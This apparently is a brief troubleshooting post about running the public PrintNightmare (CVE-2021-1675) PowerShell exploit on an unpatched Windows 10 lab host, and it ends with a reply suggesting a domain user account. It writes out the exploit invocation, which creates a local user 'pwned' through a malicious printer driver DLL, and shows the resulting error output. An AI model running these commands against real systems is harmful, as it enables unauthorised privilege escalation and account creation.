CVE-2021-1675
CVE-2021-1675 copied to clipboard
[!] EnumPrinterDrivers should fail!
Run from an out of date Win10 host, Windows defender disabled, firewall disabled, file and printer sharing enabled, no mitigation steps taken. Print spooler is running, and allowing inbound client connections.
PS C:\Users\student\Desktop> systeminfo
Host Name: CLIENT251 OS Name: Microsoft Windows 10 Pro OS Version: 10.0.16299 N/A Build 16299
PS C:\Users\student\Desktop> import-module .\CVE-2021-1675.ps1 PS C:\Users\student\Desktop> invoke-nightmare -NewUser pwned -NewPassword "pwned!" -DriverName "PrintMe" [+] created payload at C:\Users\student\AppData\Local\Temp\nightmare.dll [!] EnumPrinterDrivers should fail!
it will solve for you if you use the domain user account not the admin